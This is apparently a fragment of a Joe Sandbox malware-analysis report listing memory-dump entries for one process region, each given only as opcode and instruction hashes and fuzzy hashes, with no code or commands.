                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: de96eadeae0780ad099851971eab849fc3ca5ee173f8362d332970f6682b6220
                                                                                      • Instruction ID: 03047f413460102e24960025d5043128fce397b2f0698e170242e9ccdea7bfc3
                                                                                      • Opcode Fuzzy Hash: de96eadeae0780ad099851971eab849fc3ca5ee173f8362d332970f6682b6220
                                                                                      • Instruction Fuzzy Hash: E3412761B0DA890FE789A77C94596797FD5EF8A214F0841FEE04EC72E3DD289C068341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc18db9a4842721006c7debd96e223d40c9d47906b107faf5798dffc75084ecb
                                                                                      • Instruction ID: 0c5d13c19da7970ba37623a67eae96e85f2673b09e55135d997967192e9dca3b
                                                                                      • Opcode Fuzzy Hash: fc18db9a4842721006c7debd96e223d40c9d47906b107faf5798dffc75084ecb
                                                                                      • Instruction Fuzzy Hash: A441BA7194990A8FEB88EB68C4596BD7BF1FF59310B04457AE40DD3263EE389845C750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01353b2f8fcb0f594c3661090b252019b0b8d98caf4e1925bb0c713c67453880
                                                                                      • Instruction ID: 7db5defb1952ee925f4fd0349e8d7f9de2a46a18e7187b7f829f1ee1436e617b
                                                                                      • Opcode Fuzzy Hash: 01353b2f8fcb0f594c3661090b252019b0b8d98caf4e1925bb0c713c67453880
                                                                                      • Instruction Fuzzy Hash: EB416371A1891D8FEB98EB78C459AB977E6EF99310F144579E00ED32A2DE34EC41C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b00b98acda2679dd1beca496be81091774602d8194ee8942062e2cc66a965a75
                                                                                      • Instruction ID: 1114765e349e2f245f215abb1dd84fab907a89aa6a30bc27bf98b7d7f7085805
                                                                                      • Opcode Fuzzy Hash: b00b98acda2679dd1beca496be81091774602d8194ee8942062e2cc66a965a75
                                                                                      • Instruction Fuzzy Hash: 71319561B199490FE798AB2CD45A779B7C6EB99315F4446BEE04EC32D3DE649C028380
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99863b343966d21e29f61a66d9c4d680cf5c5c907788016cb396dca4f1f7df13
                                                                                      • Instruction ID: f8396f91504336f7b83c8a4b8d5ee7f754f332dbad6dc215fc81d9dd0e3de590
                                                                                      • Opcode Fuzzy Hash: 99863b343966d21e29f61a66d9c4d680cf5c5c907788016cb396dca4f1f7df13
                                                                                      • Instruction Fuzzy Hash: 71419571E0850A8BEB88EB78C0556BABBE5FF55310F5481BDE01ED32D2DE29E845C780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fe04199e8ab0b7990cfb4e67854845a9dc2c0ad6222242b72e63c2134ded66d
                                                                                      • Instruction ID: 81d6a686d0aa45ea6519207783a3d10c29998e6f0c818506ac7a8e3f82101ee8
                                                                                      • Opcode Fuzzy Hash: 1fe04199e8ab0b7990cfb4e67854845a9dc2c0ad6222242b72e63c2134ded66d
                                                                                      • Instruction Fuzzy Hash: B631B491B18A0A4FF744B7BCD8197BD7BD6EB99751F0482B6F00DC3293EE1898414381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45e911f3113ff7efb000501d663563ecf2c16b8fa08ceead850ae2dadbafe0b1
                                                                                      • Instruction ID: df74438f2a776081f21c0feb791dafc9af59604f6094c9565b662a91db058a8b
                                                                                      • Opcode Fuzzy Hash: 45e911f3113ff7efb000501d663563ecf2c16b8fa08ceead850ae2dadbafe0b1
                                                                                      • Instruction Fuzzy Hash: 5541157185968A8FE70997648C625F9BFE4EF42310B4481BAE04ED74D3DE1CA84A8395
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 221edfa1818801d15db471fd03d4ca2265b086b0b4d51dfac2d49285e364c325
                                                                                      • Instruction ID: c399ffbab440cc860d8fa312dbfa6d9e8d1c3f5fbbb42f05524ab2a362cdd2ad
                                                                                      • Opcode Fuzzy Hash: 221edfa1818801d15db471fd03d4ca2265b086b0b4d51dfac2d49285e364c325
                                                                                      • Instruction Fuzzy Hash: ED41C470E1864E8FEB48EB78C4656A97BF1FF99300F548575E00DD3297DE38A8058790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8dbc1f9bb2f27ef8d45c776a1e0ba7b1cf6d15d95cce36de40d344e2483076a3
                                                                                      • Instruction ID: 2c691e13162134d2a1451fd317abe659b43d0cd1d1eb1a3e423dfe058241d525
                                                                                      • Opcode Fuzzy Hash: 8dbc1f9bb2f27ef8d45c776a1e0ba7b1cf6d15d95cce36de40d344e2483076a3
                                                                                      • Instruction Fuzzy Hash: E231A492B18D0A4BF784B7BCD81A7BD66D6EBD9751F1082BAF00EC3293ED1898414381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 099bc23c134f7bc79845697f114fd48af66c8acd556f9f2b981b18a9dd0bd282
                                                                                      • Instruction ID: 7faaec75d2e64a75b2b19fae70ca2aa919da767e95e3d6efede48369090f832a
                                                                                      • Opcode Fuzzy Hash: 099bc23c134f7bc79845697f114fd48af66c8acd556f9f2b981b18a9dd0bd282
                                                                                      • Instruction Fuzzy Hash: 6B31923140D7488FDB59DBA8D885AEABFF0FF56310F0481AED049C3552D764A805CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0de8072b6e1d621ca16a2ba60a2be6c4ff4436d7de92fa42e41d0c71ace3f1f3
                                                                                      • Instruction ID: a95564eb6e277c7209a8591abd50bbbd66d7061f13b445ba93923f3dbed647dd
                                                                                      • Opcode Fuzzy Hash: 0de8072b6e1d621ca16a2ba60a2be6c4ff4436d7de92fa42e41d0c71ace3f1f3
                                                                                      • Instruction Fuzzy Hash: 3031F53060DA9ACFD74EFB38C8515A97BE1FF06304B4505E6D049C3297DA38E885C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9135167d860c822ee302bb29583be20e296e914e6c38e9c2187716734ae9468
                                                                                      • Instruction ID: a9895151054a520abe1c0a1d6de664110b87d54d419a2c46909d46c6843b152c
                                                                                      • Opcode Fuzzy Hash: e9135167d860c822ee302bb29583be20e296e914e6c38e9c2187716734ae9468
                                                                                      • Instruction Fuzzy Hash: 3231F4B2A0994A8FEB5CDB38D4956BDBBE0FF55310F00527EE04ED3292DE299805C781
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 363bd537baddb86937753d0408d29bea29d271cccd6f9a2651bbc53af75bf36d
                                                                                      • Instruction ID: 18cdf706b486cac8d159208f47beb4f721b56fc4832ccab048fb1cabebd923ab
                                                                                      • Opcode Fuzzy Hash: 363bd537baddb86937753d0408d29bea29d271cccd6f9a2651bbc53af75bf36d
                                                                                      • Instruction Fuzzy Hash: A821C561E4E6438BF799B778845667A2A9AAF93310F5480B9F00EC61C7FD2CE80943D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 882a19770902adb48091e537dca2fd6924c93672546bd1041cd1b5f11650cce0
                                                                                      • Instruction ID: 3dddd2db6e6ec65133cf5dffbcff8b25bde509f8f383b6909fb444d31a2a3153
                                                                                      • Opcode Fuzzy Hash: 882a19770902adb48091e537dca2fd6924c93672546bd1041cd1b5f11650cce0
                                                                                      • Instruction Fuzzy Hash: FC210271919A4BCFF7589B6884465B5BBE4FF52304F0095B9E04EC3192EF28E88A87C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e50cf470cceffc9aa01e7c1b645614fb7dcf9f926950f5b011dcfbca30ae44c
                                                                                      • Instruction ID: f193bded049b684e27f8f325e184f2547b2ffb55654258ff2ac53c20974452c4
                                                                                      • Opcode Fuzzy Hash: 2e50cf470cceffc9aa01e7c1b645614fb7dcf9f926950f5b011dcfbca30ae44c
                                                                                      • Instruction Fuzzy Hash: 3021C250A1D95B8BF749B7A884127B97BE5EB99700F5041B5E00EC36D3ED1CA80483D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 298b4a677e01645931a101e43e602906570324b48a5c65a826a82ce488ab08c1
                                                                                      • Instruction ID: 8885d97a11ba738768ba63cd990844b538ceb37ef05cd80dfa86d0d5197cfab6
                                                                                      • Opcode Fuzzy Hash: 298b4a677e01645931a101e43e602906570324b48a5c65a826a82ce488ab08c1
                                                                                      • Instruction Fuzzy Hash: A921F3B190DB8A8FE758DB748456160BFE4FF52304F0491BAE04DC3192EF28E84987C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22a8ffeb63d353f113787659019c655e979bcd42d0036b15a36183ced9903019
                                                                                      • Instruction ID: b3b6b4a599ff35ec16e50c8045e9e3286af95682ed4b77cb6929367d7e3b9a38
                                                                                      • Opcode Fuzzy Hash: 22a8ffeb63d353f113787659019c655e979bcd42d0036b15a36183ced9903019
                                                                                      • Instruction Fuzzy Hash: 4B11E92198E68B8FF7469B6498115FA7FE9DF87250F0480B6F08EC6193ED1C990A83D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ceaaecc2a100a8b328144ad30f2dbb58fc27a6ab09586c62f51f25596155ffd5
                                                                                      • Instruction ID: 18bdbff2ccf2d527a681338b57bbc21420eaa1e09e385ec560e5770e7a630bb0
                                                                                      • Opcode Fuzzy Hash: ceaaecc2a100a8b328144ad30f2dbb58fc27a6ab09586c62f51f25596155ffd5
                                                                                      • Instruction Fuzzy Hash: 78019671D0868DCFE78DEB3884691B97FE1EB65204F8440BFD04AE65A2EA3455458750
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1cda225c8775d1b78ebc44719af08d5a318887e7811909d0c0ad2fc952f975d
                                                                                      • Instruction ID: bce3f5c08e85be5390a3512a4b6fdbb85a128f1078ac99eb0ff842aaf20643d3
                                                                                      • Opcode Fuzzy Hash: c1cda225c8775d1b78ebc44719af08d5a318887e7811909d0c0ad2fc952f975d
                                                                                      • Instruction Fuzzy Hash: 7301CC30A5D90B8BF759972894016F97BE5EF57304F508075E44EC2183ED18D94543C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1dc7b0dcaadf0ac01230a434f061352f148e6fd700b5b89c06bef0ae6661134
                                                                                      • Instruction ID: 76496381304af9bb4f0b3dbfbdb37be75eaea82e5229dff399dcccefc423fe1a
                                                                                      • Opcode Fuzzy Hash: d1dc7b0dcaadf0ac01230a434f061352f148e6fd700b5b89c06bef0ae6661134
                                                                                      • Instruction Fuzzy Hash: 7201C472D08A498FDB51AB64D41A5FE7BB0FF19301F4501FBD049C7192EB2898408791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e21d2528fb23941946dc4b546f984ac060cb3ba4711c47174a40b42dc27281fe
                                                                                      • Instruction ID: 8b02ee712afb223a9127c9d47ca93195de623a5de825505fecf9a0f08b38c8ab
                                                                                      • Opcode Fuzzy Hash: e21d2528fb23941946dc4b546f984ac060cb3ba4711c47174a40b42dc27281fe
                                                                                      • Instruction Fuzzy Hash: A4F0D172E0491E8EEB50ABA8D4096FE77E4EF19301F0005BAE44DD2181DE34694087C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1fd4125e351baa6b3ec214892831f2f76d41c513b4f2257f89d44088489e542
                                                                                      • Instruction ID: 20e01b4a0b5c9b49374ff11f6cf9cfe502c06a902d9cb69a70fe032ae72dd093
                                                                                      • Opcode Fuzzy Hash: c1fd4125e351baa6b3ec214892831f2f76d41c513b4f2257f89d44088489e542
                                                                                      • Instruction Fuzzy Hash: 2101A291E4E6478FF798777880262796ED5AF67300F5480B9E04EC25D3FD1DA8058381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a90ef43134fe50df4d9d562a37155ac37d67bf4b4a4905c752c538ae1c9059f
                                                                                      • Instruction ID: 819515163dad2d849745856636ee91a6545aeb6f003cd897ed7e35d8b50bae17
                                                                                      • Opcode Fuzzy Hash: 8a90ef43134fe50df4d9d562a37155ac37d67bf4b4a4905c752c538ae1c9059f
                                                                                      • Instruction Fuzzy Hash: 0CF04F70D4D417CAF295E728C05167AAAAAAFA6310F508575E01EC21D7EE38F45983D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22d3c7baf2bb6c55945ddd5c6d8f339b329bbaf6e64370388aa046ab44e8000f
                                                                                      • Instruction ID: 28e66c66c9b4f44988a8b1f35fe0721e7d9ded5fe004db169b796812395fab3b
                                                                                      • Opcode Fuzzy Hash: 22d3c7baf2bb6c55945ddd5c6d8f339b329bbaf6e64370388aa046ab44e8000f
                                                                                      • Instruction Fuzzy Hash: 90E0C27286978D8FE7425F6058121DA7B64EF52200F4115CBF40C87052E720D6188382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34f275fefc3b23bddcd4f4dac6029d884ff42ea52c657f0b59a330fce18064e9
                                                                                      • Instruction ID: 5db0ca4df869c9bb084cf5be2a64d6dbbd0c488eef48bcdeb051b45f123d5959
                                                                                      • Opcode Fuzzy Hash: 34f275fefc3b23bddcd4f4dac6029d884ff42ea52c657f0b59a330fce18064e9
                                                                                      • Instruction Fuzzy Hash: 3BD0C200C8E6C38BF70B23780D825907FA48A031A0B8942D2E448C74D3E94D949E42B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3794388881.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaac5b0000_tmpB20E.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16152a4a1a9adf2f54ee1af276f4658a1792d922d735eed7c51ab575511bb112
                                                                                      • Instruction ID: 570fcff2512eb0da64856ad636910ec4bbd263865fe72ffbe154efbb21ac653e
                                                                                      • Opcode Fuzzy Hash: 16152a4a1a9adf2f54ee1af276f4658a1792d922d735eed7c51ab575511bb112
                                                                                      • Instruction Fuzzy Hash: 33A00244CE780B55AC0832BA1D87094BE945BCA114FD59560F80C80187F88E95ED06D3